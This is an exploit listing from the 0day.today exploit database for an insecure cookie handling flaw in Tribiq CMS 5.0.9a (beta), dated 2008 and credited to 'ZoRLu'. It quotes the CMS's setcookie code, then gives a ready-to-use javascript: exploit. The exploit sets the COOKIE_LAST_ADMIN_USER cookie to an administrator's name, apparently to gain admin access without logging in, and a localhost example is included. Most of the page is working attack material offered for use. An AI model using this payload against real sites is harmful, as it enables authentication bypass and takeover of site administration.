[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Tribiq CMS 5.0.9a (beta) Insecure Cookie Handling Vulnerability

Author
ZoRLu
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-3969
Category
web applications
Date add
31-10-2008
Platform
unsorted
===============================================================
Tribiq CMS 5.0.9a (beta) Insecure Cookie Handling Vulnerability
===============================================================


biqcms 5.0.9a (beta) Insecure Cookie Handling Vulnerability
[~] ----------------------------------------------------------
[~] Discovered By: ZoRLu
[~]
[~] Date: 30.10.2008
[~] 
[~] N0T: a.q kpss : ) )
[~]
[~] -----------------------------------------------------------

code:

        setcookie ("COOKIE_LAST_ADMIN_USER", $newAdmin["username"], time()+8640000, '/');
        setcookie ("COOKIE_LAST_ADMIN_LANG", $newAdmin["use_language_id"], time()+8640000, '/');


Exploit:

javascript:document.cookie = "COOKIE_LAST_ADMIN_USER=real_admin_name; path=/"; document.cookie = "COOKIE_LAST_ADMIN_LANG=en-GB; path=/";

example for my localhost:

javascript:document.cookie = "COOKIE_LAST_ADMIN_USER=zorlu; path=/"; document.cookie = "COOKIE_LAST_ADMIN_LANG=en-GB; path=/";





#  0day.today [2024-12-25]  #